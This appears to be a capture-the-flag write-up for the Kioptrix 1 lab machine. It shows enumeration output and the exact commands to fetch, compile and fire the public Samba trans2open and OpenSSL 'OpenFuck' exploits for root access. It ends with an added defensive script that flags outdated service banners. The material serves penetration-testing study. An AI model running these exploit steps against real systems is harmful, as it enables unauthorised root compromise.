First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- kioptrix1.vhub
smbclient -L \\\\$target
Using this method, I was able to retrieve the samba server version.
Unix.Samba 2.2.1a MYGROUP
WEB - 80
/cgi-bin/ (Status: 403) [Size: 272]
/cgi-bin/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 2890]
/index.html (Status: 200) [Size: 2890]
/manual (Status: 301) [Size: 294]
/mrtg (Status: 301) [Size: 292]
/test.php (Status: 200) [Size: 27]
/usage (Status: 301) [Size: 293]
/~operator (Status: 403) [Size: 273]
/~root (Status: 403) [Size: 269]
WEB - 443
Since the Samba version used by the target was uncovered, I decided to look at Exploit-DB for any public exploits that might be available.
searchsploit samba 2.2
I discovered an RCE exploit that supposedly worked on any version below Samba 2.2.8. This fit our target perfectly.
searchsploit -m multiple/remote/10.c
I then proceeded to compile the exploit before executing it.
gcc -o exploity 10.c
Since we uncovered that our target was running Linux|Red Hat during our enumeration phase, I set -b as linux and fired it at the target.
./exploity -b 0 $target
And I was in the machine as root!
During the enumeration phase, I also noticed that the OpenSSL version was wayyy too old. A quick look at exploit db revealed multiple exploits that were targeted at that version.
I pulled the exploit down and realized that there were some edits that I had to make to the exploit.
After editing the exploit, I compiled and ran it as follows. Also, do remember to install libssl-dev if you don't already have it.
gcc -o OpenFuck OpenFuck.c -lcrypto
Next I just had to select the correct offset for my target and I was good to go.
The Apache and OS versions were uncovered during the enumeration stage.
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
./OpenFuck 0x6b 192.168.0.176 443 -c 50
And I was root...again!
Those were the two ways I was able to break this box!
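Both footholds above came straight from service banners (the Samba version from smbclient, the Apache/mod_ssl/OpenSSL line from nmap), so the defensive lesson is to compare such banners against minimum patched versions before anyone else does. The following is an added example, not part of the original write-up; it parses the two banners quoted on this page and flags anything below a minimum. Samba 2.2.8 is the bound this write-up gives; the OpenSSL 0.9.6e bound is an assumption (the 2002 release that addressed the 0.9.6b SSLv2 issue).

```python
import re

# Banners exactly as they appeared in this write-up's enumeration output
BANNERS = [
    "Unix.Samba 2.2.1a MYGROUP",
    "443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) "
    "(Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
]

# Lowest version that should be seen on a patched host.
# Samba 2.2.8: the bound given in the write-up (exploit works below it).
# OpenSSL 0.9.6e: assumption, the release that fixed the 0.9.6b SSLv2 flaw.
MIN_SAFE = {"Samba": "2.2.8", "OpenSSL": "0.9.6e"}

# Product followed by a space or slash, then a dotted version with an
# optional trailing letter (2.2.1a, 0.9.6b)
PATTERNS = {
    product: re.compile(product + r"[ /](\d+(?:\.\d+)*[a-z]?)")
    for product in MIN_SAFE
}


def parse_version(text):
    """'2.2.1a' -> (2, 2, 1, 0, 1): four numeric fields padded with zeros,
    then the suffix letter as a number (a=1, b=2, ...; none=0) so that
    2.2.1 < 2.2.1a < 2.2.2 compares correctly as plain tuples."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums = nums + (0,) * (4 - len(nums))
    letter = m.group(2)
    return nums + ((ord(letter) - ord("a") + 1) if letter else 0,)


def find_outdated(banners):
    """Return [(product, seen_version, minimum)] for every banner whose
    version is below the MIN_SAFE entry for that product."""
    findings = []
    for line in banners:
        for product, rx in PATTERNS.items():
            m = rx.search(line)
            if m and parse_version(m.group(1)) < parse_version(MIN_SAFE[product]):
                findings.append((product, m.group(1), MIN_SAFE[product]))
    return findings


if __name__ == "__main__":
    for product, seen, minimum in find_outdated(BANNERS):
        print(f"{product} {seen} is below {minimum}: schedule an upgrade")
```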